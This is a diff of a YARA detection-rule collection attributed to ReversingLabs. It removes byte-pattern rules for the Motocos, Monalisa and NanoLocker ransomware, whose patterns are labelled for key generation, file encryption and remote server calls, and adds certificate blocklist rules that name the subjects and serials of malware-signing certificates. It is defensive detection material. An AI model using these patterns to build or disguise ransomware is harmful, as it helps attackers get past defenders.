-            0B 02 03 20 ?? 07 00 00 28 60 00 00 06 20 ?? 07 00 00 28 60 00 00 06 73 ?? 00 00 0A 7D
-            1B 00 00 04 20 ?? 07 00 00 28 60 00 00 06 13 0B 02 04 20 ?? 07 00 00 28 60 00 00 06 20
-            ?? 07 00 00 28 60 00 00 06 73 ?? 00 00 0A 7D 1C 00 00 04 20 ?? 07 00 00 28 60 00 00 06
-            13 0B 02 7B 1C 00 00 04 20 ?? 07 00 00 28 60 00 00 06 6A 6F ?? 00 00 0A 00 20 ?? 07 00
-            00 28 60 00 00 06 13 0B 20 ?? 07 00 00 28 60 00 00 06 8D 1E 00 00 01 0A 20 ?? 07 00 00
-            28 60 00 00 06 13 0B 20 ?? 07 00 00 28 60 00 00 06 6A 13 04 20 ?? 07 00 00 28 60 00 00
-            06 13 0B 02 7B 1B 00 00 04 6F ?? 00 00 0A [0-2] 13 05 20 ?? 07 00 00 28 60 00 00 06 13
-            0B 73 ?? 00 00 0A 0C 20 ?? 07 00 00 28 60 00 00 06 13 0B 00 0E 05 20 ?? 07 00 00 28 60
-            00 00 06 59 13 0C 11 0C 45 02 00 00 00 02 00 00 00 ?? 00 00 00 2B ?? 00 20 ?? 07 00 00
-            28 60 00 00 06 13 0B 02 7B 1C 00 00 04 08 05 0E 04 6F ?? 00 00 0A [0-2] 20 ?? 07 00 00
-            28 60 00 00 06 73 ?? 00 00 0A 0B 2B ?? 00 20 ?? 07 00 00 28 60 00 00 06 13 0B 02 7B 1C
-            00 00 04 08 05 0E 04 6F ?? 00 00 0A [0-2] 20 ?? 07 00 00 28 60 00 00 06 73 ?? 00 00 0A
-            0B 00 2B 62 20 ?? 07 00 00 28 60 00 00 06 13 0B 02 7B 1B 00 00 04 06 20 ?? 07 00 00 28
-            60 00 00 06 20 ?? 07 00 00 28 60 00 00 06 6F ?? 00 00 0A [0-2] 0D 20 ?? 07 00 00 28 60
-        }
-		$encrypt_routine_2 = {
-            00 00 06 13 0B 07 06 20 ?? 07 00 00 28 60 00 00 06 09 6F ?? 00 00 0A 00 20 ?? 07 00 00
-            28 60 00 00 06 13 0B 11 04 09 6A D6 13 04 00 20 ?? 07 00 00 28 60 00 00 06 13 0B 11 04
-            11 05 FE 04 13 0D 11 0D 2D 86 ?? 45 01 00 00 00 F6 FF FF FF 17 2D 06 D0 4F 00 00 06 26
-            20 ?? 07 00 00 28 60 00 00 06 13 0B 07 6F ?? 00 00 0A 00 20 ?? 07 00 00 28 60 00 00 06
-            13 0B 02 7B 1B 00 00 04 6F ?? 00 00 0A 00 20 ?? 07 00 00 28 60 00 00 06 13 0B 02 7B 1C
-            00 00 04 6F ?? 00 00 0A 00 20 ?? 07 00 00 28 60 00 00 06 13 0B 0E 05 20 ?? 07 00 00 28
-            60 00 00 06 FE 01 13 0D 11 0D 2C 32 ?? 45 01 00 00 00 F6 FF FF FF 20 ?? 07 00 00 28 60
-            00 00 06 13 0B 03 73 ?? 00 00 0A 13 06 20 ?? 07 00 00 28 60 00 00 06 13 0B 11 06 6F ??
-            00 00 0A 00 00 20 ?? 07 00 00 28 60 00 00 06 13 0B 0E 05 20 ?? 07 00 00 28 60 00 00 06
-            FE 01 13 0D 11 0D 2C ?? [0-20] 20 ?? 07 00 00 28 60 00 00 06 13 0B 03 73 ?? 00 00 0A 13
-            07 20 ?? 07 00 00 28 60 00 00 06 13 0B 11 07 6F ?? 00 00 0A 00 00 20 ?? ?? 00 00 28 60
-            00 00 06 13 0B 02 7B 1B 00 00 04 6F ?? 00 00 0A 00 20 ?? ?? 00 00 28 60 00 00 06 13 0B
-            02 7B 1C 00 00 04 6F ?? 00 00 0A 00 DD 3B 01 00 00 11 0A 2B 0D 11 0A 20 ?? ?? 00 00 28
-        }
-		$encrypt_routine_3 = {
-            60 00 00 06 58 20 ?? 08 00 00 28 60 00 00 06 13 0A 45 26 00 00 00 00 00 00 00 ?? FC FF
-            FF ?? FC FF FF ?? FC FF FF ?? FC FF FF ?? FC FF FF ?? FC FF FF ?? FC FF FF ?? ?? FF FF
-            ?? FD FF FF ?? FD FF FF ?? FD FF FF 00 00 00 00 ?? FD FF FF ?? FD FF FF ?? FD FF FF ??
-            FD FF FF ?? FD FF FF ?? FD FF FF ?? ?? FF FF ?? FD FF FF ?? FD FF FF ?? FD FF FF ?? ??
-            FF FF ?? FE FF FF ?? FE FF FF ?? FE FF FF ?? FE FF FF ?? FE FF FF ?? FE FF FF ?? FE FF
-            FF ?? FE FF FF E8 FE FF FF FC FE FF FF 10 FF FF FF 11 FF FF FF 29 FF FF FF 41 FF FF FF
-            DE 6D 11 0B 13 0A 11 09 20 ?? 08 00 00 28 60 00 00 06 30 16 ?? 45 01 00 00 00 F6 FF FF
-            FF 20 ?? 08 00 00 28 60 00 00 06 2B 02 11 09 45 02 00 00 00 00 00 00 00 11 FF FF FF DE
-            34 75 4B 00 00 01 14 FE 03 11 09 20 ?? 08 00 00 28 60 00 00 06 FE 03 5F 11 0A 20 ?? 08
-            00 00 28 60 00 00 06 FE 01 5F FE 11 74 4B 00 00 01 28 57 00 00 0A DE 93 20 ?? 08 00 00
-            28 60 00 00 06 28 ?? 00 00 0A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $encrypt_routine_1 and $encrypt_routine_2 and $encrypt_routine_3 )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TRANS LTD" and pe.signatures [ i ] . serial == "3c:e6:5e:a0:57:b9:75:d2:c1:7e:af:2c:22:97:b1:eb" and 1528243200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Motocos : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_5D085A9A288549D09Edc4941 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Motocos ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "cda44b86-c747-5b48-acd8-e68311ab24a3"
-		date = "2021-09-17"
-		modified = "2021-09-17"
+		id = "8fa1f434-2061-5131-9378-58c584eff447"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Motocos.yara#L1-L75"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14386-L14402"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "34b99847f029a291808f08ba6e6ae62a54e6fed5acc928fe4828054801786881"
+		logic_hash = "dff7c2d727acca753b030d05028590e1a5577121bb2b4c0dcfcb70b4c9d77cbf"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Motocos"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$generate_key = {
-            55 8B EC 83 C4 ?? 53 89 4D ?? 89 55 ?? 8B D8 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ??
-            ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 83 7D ?? ?? 74 ?? 8B 45 ?? 8B 15
-            ?? ?? ?? ?? 8B 12 E8 ?? ?? ?? ?? 75 ?? B9 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 89 45 ?? 33 D2 55 68 ?? ??
-            ?? ?? 64 FF 32 64 89 22 8B 4D ?? 8B 55 ?? 8B C3 E8 ?? ?? ?? ?? 89 45 ?? 33 D2 55 68
-            ?? ?? ?? ?? 64 FF 32 64 89 22 8B 45 ?? 85 C0 74 ?? 83 E8 ?? 8B 00 8B D8 89 5D ?? 80
-            7D ?? ?? 75 ?? 8B 5D ?? 03 DB 53 8D 45 ?? B9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 83 C4 ?? 53 8D 45 ?? 50 8B 45 ?? 50 6A ?? 80 7D ?? ?? F5 1B C0 50 6A ?? 8B 45
-            ?? 50 E8 ?? ?? ?? ?? 83 F8 ?? 1B C0 40 84 C0 75 ?? B9 ?? ?? ?? ?? B2 ?? A1 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 50 8D 45 ?? B9 ?? ?? ?? ?? 8B 15 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 8B 55 ?? 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0
-            5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ??
-            33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? C3 E9 ?? ??
-            ?? ?? EB ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ??
-            8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5B 8B E5 5D C2
-        }
-		$encrypt_files = {
-            55 8B EC 83 C4 ?? 53 56 57 33 C9 89 4D ?? 89 4D ?? 89 55 ?? 8B 45 ?? E8 ?? ?? ?? ??
-            33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 C6 45 ?? ?? 33 D2 55 68 ?? ?? ?? ?? 64 FF
-            32 64 89 22 B2 ?? 8B 45 ?? E8 ?? ?? ?? ?? B2 ?? 8B 45 ?? E8 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8B D8 8B C3 8B D8 F6 C3 ?? 74 ?? 66 83 E3 ?? B2 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B C3
-            E8 ?? ?? ?? ?? 8B D0 B1 ?? 8B 45 ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8B 4D ?? B2 ?? A1 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 33 D2
-            55 68 ?? ?? ?? ?? 64 FF 32 64 89 22 8B 45 ?? 8B 10 FF 12 8B C8 8B 55 ?? A1 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8B C8 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 88 45 ?? 33 C0 5A 59 59 64
-            89 10 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ??
-            ?? EB ?? 80 7D ?? ?? 75 ?? 8D 45 ?? 50 8B 45 ?? 89 45 ?? C6 45 ?? ?? B8 ?? ?? ?? ??
-            89 45 ?? C6 45 ?? ?? 8D 55 ?? B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ??
-            E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 F8 ?? 1B C0 40 88 45
-            ?? 33 C0 5A 59 59 64 89 10 E9 ?? ?? ?? ?? E9
-        }
-		$find_files = {
-            55 8B EC 83 C4 ?? 53 56 57 33 C9 89 4D ?? 8B FA 89 45 ?? 33 C0 55 68 ?? ?? ?? ?? 64
-            FF 30 64 89 20 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 85 DB 7C ?? 8B 45 ?? 66
-            83 3C 58 ?? 75 ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 45 ?? E8 ?? ?? ?? ??
-            8B 75 ?? 85 F6 74 ?? 83 EE ?? 8B 36 8D 45 ?? 50 8D 53 ?? 8B CE 8B 45 ?? E8 ?? ?? ??
-            ?? 8B C7 8B 55 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8
-            ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8B C7 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68
-            ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5F 5E 5B 59 59 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $generate_key ) and ( $find_files ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "5d:08:5a:9a:28:85:49:d0:9e:dc:49:41" and 1478757821 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Monalisa : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_7D20Dec3797A1Ac30649Ebb184265B79 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Monalisa ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "34addb63-2426-59a2-b79b-052a9161d361"
-		date = "2022-05-13"
-		modified = "2022-05-13"
+		id = "5344bda2-bc11-5700-a0f7-52792c5bb87a"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Monalisa.yara#L1-L83"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14404-L14420"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "0bcb79dff111ec05ac93bbe9a777546bd6234dc60d9f6982c03cd0bc3b26b038"
+		logic_hash = "78c0575a1c9ecf37ef5bac0612c20f96b8641875b0ba786979adc8a77f001a5e"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Monalisa"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 53 56 A1 ?? ?? ?? ?? 33
-            C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 75 ?? 83 EC ?? C7 45 ?? ?? ?? ?? ?? 8B CC 89 65
-            ?? 8D 45 ?? B3 ?? 51 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC 89 65 ?? 33 C0 6A
-            ?? 68 ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 66 89 01 E8 ?? ?? ?? ??
-            83 EC ?? C6 45 ?? ?? 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? 8A D3 88 5D ?? 8B CE E8 ?? ??
-            ?? ?? 8B 55 ?? 83 C4 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ??
-            ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ??
-            83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? E8 ??
-            ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5E 5B 8B E5 5D C3
-        }
-		$write_proc_mem = {
-            8D 45 ?? 50 FF 76 ?? 8B 46 ?? 03 C7 50 8B 06 03 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ??
-            85 C0 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 3E 0F B7 41 ?? 48 3B D8 75 ?? 8B 51 ??
-            EB ?? 8B 4D ?? 8B 35 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 56 ?? 8B 4E ?? 2B D7 8B C1 25 ??
-            ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? EB ?? 8B C1 25 ?? ?? ?? ?? 3D ?? ?? ??
-            ?? 75 ?? B8 ?? ?? ?? ?? EB ?? 8B C1 25 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? B8 ?? ?? ??
-            ?? EB ?? 8B C1 25 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? EB ?? F7 C1 ?? ??
-            ?? ?? 74 ?? B8 ?? ?? ?? ?? EB ?? F7 C1 ?? ?? ?? ?? 74 ?? B8 ?? ?? ?? ?? EB ?? 85 C9
-            B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 48 C1 8D 4D ?? 51 50 8B 45 ?? 52 03 C7 50 FF 75 ??
-            FF 15
-        }
-		$encrypt_files = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 50
-            8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B C1 83 F8 ?? 0F 82 ??
-            ?? ?? ?? 83 3D ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 51 0F 43 05 ?? ?? ?? ?? 50 6A ?? 68 ??
-            ?? ?? ?? 51 FF 75 ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ??
-            ?? ?? E8 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 33 C9 C7 05 ?? ?? ?? ?? ?? ?? ??
-            ?? 0F 10 00 0F 11 05 ?? ?? ?? ?? F3 0F 7E 40 ?? 66 0F D6 05 ?? ?? ?? ?? C7 40 ?? ??
-            ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 66 89 08 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ??
-            ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77
-            ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64
-            89 0D ?? ?? ?? ?? 59 8B E5 5D C3
-        }
-		$generate_key = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89
-            45 ?? 56 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B 75 ??
-            8B 0C 88 A1 ?? ?? ?? ?? 3B 81 ?? ?? ?? ?? 7F ?? 56 FF 75 ?? FF 35 ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? 85 C0 74 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5E 8B 4D ?? 33 CD E8 ?? ??
-            ?? ?? 8B E5 5D C2 ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 3D ?? ?? ?? ?? ??
-            75 ?? B9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 68 ?? ?? ?? ??
-            8D 4D ?? E8 ?? ?? ?? ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 8D 45 ?? 50 E8
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $write_proc_mem ) and ( $generate_key ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Jiang Liu" and pe.signatures [ i ] . serial == "7d:20:de:c3:79:7a:1a:c3:06:49:eb:b1:84:26:5b:79" and 1474156800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Nanolocker : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_187D92861076E469B5B7A19E2A9Fd4Ba : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects NanoLocker ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a31dad2e-2738-527b-a6e9-322757e2ec30"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "0a156a49-c737-5bdb-9178-34121af490d6"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.NanoLocker.yara#L1-L79"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14422-L14438"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "7fdb021f22d97bf8a00fd856ef913695a0d6fbaad1138b5a5cc2cc8768b130be"
+		logic_hash = "7383a7fb31a0a913dff1740015ff702642fbb41d8e5a528a8684c80e66026e9d"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "NanoLocker"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_file_1 = {
-            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 05 ?? ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6
-            05 ?? ?? ?? ?? ?? 8D 3D ?? ?? ?? ?? 33 C9 C6 07 ?? 47 41 81 F9 ?? ?? ?? ?? 75 ?? C7
-            05 ?? ?? ?? ?? ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 0B C0 0F 84 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 6A
-            ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 6A
-            ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ??
-            ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0B C0 0F 84 ?? ?? ?? ?? 81 3D
-            ?? ?? ?? ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 81 C6 ?? ?? ?? ?? 56 E8
-            ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 56 68 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 03 F0 46 8A 06 3C ?? 0F 85 ?? ?? ?? ??
-            6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8
-        }
-		$encrypt_file_2 = {
-            A3 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 81 3D ?? ?? ?? ??
-            ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 6A ??
-            E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? A1 ??
-            ?? ?? ?? 2D ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? A3 ??
-            ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            6A ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ??
-            ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ??
-            ?? ?? FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? FF 35 ??
-            ?? ?? ?? E8
-        }
-		$remote_server_1 = {
-            E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? A1 ?? ??
-            ?? ?? 83 F8 ?? 72 ?? C6 05 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF
-            35 ?? ?? ?? ?? E8
-        }
-		$remote_server_2 = {
-            E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 35 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? A3 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8
-        }
-		$enum_shares_and_encrypt_files = {
-            E8 ?? ?? ?? ?? C1 C8 ?? BA ?? ?? ?? ?? 23 D0 60 83 FA ?? 75 ?? 68 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 83 F8 ?? 76 ?? 83 F8 ?? 74 ?? 8D 35 ?? ?? ?? ?? 60 68 ?? ?? ?? ?? 56 68 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 61 8A 06 46 0A C0 75 ?? 8A 06 0A C0 75 ?? 61 D1 C8 8A 1D ??
-            ?? ?? ?? FE C3 88 1D ?? ?? ?? ?? 80 FB ?? 76 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? FF 35 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ??
